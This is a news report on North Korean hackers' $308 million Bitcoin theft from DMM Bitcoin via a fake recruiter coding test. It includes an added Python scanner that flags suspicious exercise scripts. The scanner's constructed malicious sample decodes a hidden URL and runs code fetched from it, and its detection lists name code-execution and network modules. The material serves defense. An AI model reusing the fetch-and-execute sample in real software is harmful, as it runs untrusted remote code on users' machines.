In May 2024, North Korean hackers stole $308 million worth of Bitcoin from the Japanese cryptocurrency firm DMM Bitcoin. The theft has been attributed to TraderTraitor, a threat activity group linked to North Korea. The U.S. Federal Bureau of Investigation (FBI), the Department of Defense Cyber Crime Center (DC3), and Japan's National Police Agency (NPA) have released a joint alert on the incident.
TraderTraitor is known for targeting companies in the Web3 sector through social engineering. In the DMM Bitcoin case, the hackers contacted an employee of Ginco, a Japan-based cryptocurrency wallet software company, in March 2024. Posing as a recruiter, they sent the employee a malicious Python script hosted on GitHub, presented as a pre-employment coding test.
North Korean cyber theft tactics
The victim, who had access to Ginco’s wallet management system, was compromised after copying the Python code to their personal GitHub page. In mid-May 2024, the hackers used session cookie information to impersonate the employee and gain access to Ginco’s unencrypted communications system.
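The lure described above, a "coding exercise" that the target is expected to run on a machine with privileged access, is a recurring TraderTraitor pattern. The following is an added example, not code from the page, the advisory, or Ginco: a small static triage pass that parses a take-home exercise with Python's `ast` module before anyone executes it, and flags the things a legitimate exercise has no reason to contain (dynamic code execution, network or process modules, decoding of embedded blobs, long base64-looking literals). The two sample scripts are constructed for this example; the advisory does not reproduce the script sent to the Ginco employee, so the malicious sample is a toy of the same shape, not the real payload.

```python
import ast
import base64
import re

# Constructed sample: a "fibonacci exercise" that quietly fetches and runs a
# second-stage payload. Toy written for this example, not the Ginco script.
SUSPICIOUS_SAMPLE = '''
import os, base64, urllib.request
def fibonacci(n):
    return n if n < 2 else fibonacci(n-1) + fibonacci(n-2)
_u = base64.b64decode("aHR0cDovLzEyNy4wLjAuMS9wYXlsb2Fk").decode()
exec(urllib.request.urlopen(_u).read())
print(os.environ.get("HOME"))
'''

# Constructed sample: what a genuine take-home exercise of the same task looks like.
BENIGN_SAMPLE = '''
def fibonacci(n):
    return n if n < 2 else fibonacci(n-1) + fibonacci(n-2)
if __name__ == "__main__":
    print(fibonacci(10))
'''

# Names that have no place in an unsupervised coding exercise. These sets are
# the example's own heuristic choices, not a published indicator list.
DYNAMIC_EXEC = {"exec", "eval", "compile", "__import__"}
RISKY_MODULES = {"subprocess", "socket", "urllib", "requests", "ctypes", "os", "shutil"}
DECODERS = {"b64decode", "b32decode", "a85decode", "unhexlify"}
B64_LITERAL = re.compile(r"[A-Za-z0-9+/=]{24,}")


def _call_name(func):
    """Return the bare function name for f(...) or obj.attr(...) call targets."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def _try_b64(text):
    """Decode a base64 literal if it is valid and yields printable ASCII, else None."""
    try:
        out = base64.b64decode(text, validate=True)
    except (ValueError, base64.binascii.Error):
        return None
    return out.decode("ascii") if out.isascii() else None


class TriageVisitor(ast.NodeVisitor):
    """Walks the syntax tree and records (line, reason) pairs for review."""

    def __init__(self):
        self.findings = []

    def visit_Import(self, node):
        for alias in node.names:
            if alias.name.split(".")[0] in RISKY_MODULES:
                self.findings.append((node.lineno, f"imports {alias.name}"))
        self.generic_visit(node)

    def visit_ImportFrom(self, node):
        if (node.module or "").split(".")[0] in RISKY_MODULES:
            self.findings.append((node.lineno, f"imports from {node.module}"))
        self.generic_visit(node)

    def visit_Call(self, node):
        name = _call_name(node.func)
        if name in DYNAMIC_EXEC:
            self.findings.append((node.lineno, f"dynamic code execution via {name}()"))
        elif name in DECODERS:
            self.findings.append((node.lineno, f"decodes embedded data via {name}()"))
        self.generic_visit(node)

    def visit_Constant(self, node):
        # Long base64-looking literals are a cheap way to hide a URL or stage-2 code.
        if isinstance(node.value, str) and B64_LITERAL.fullmatch(node.value):
            decoded = _try_b64(node.value)
            hint = f" (decodes to {decoded!r})" if decoded else ""
            self.findings.append((node.lineno, "base64-looking string literal" + hint))
        self.generic_visit(node)


def triage(source):
    """Return sorted (line, reason) findings for a Python source string."""
    visitor = TriageVisitor()
    visitor.visit(ast.parse(source))
    return sorted(visitor.findings)


def looks_like_plain_exercise(source):
    """True only when the static pass raises nothing; a 'no' means do not run it."""
    return not triage(source)


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(f"== {label}: run? {looks_like_plain_exercise(src)}")
        for line, reason in triage(src):
            print(f"  line {line}: {reason}")
```

This is a triage aid, not a verdict: a determined author can evade name-based checks (for example by reaching builtins through `getattr` or splitting strings), so the finding list is a reason to open the file in a sandboxed VM rather than on the workstation that holds wallet-management credentials, and a clean result is not a reason to skip that step.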
In late May 2024, the hackers used that access to manipulate a legitimate transaction request made by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time. Chainalysis, a blockchain intelligence firm, traced the stolen funds through a series of intermediary services to an online marketplace tied to the Cambodian conglomerate HuiOne Group. The incident highlights the ongoing threat posed by sophisticated state-sponsored threat actors and the need for stronger security measures in the cryptocurrency sector.
International cybersecurity and law enforcement agencies are working together to address this issue.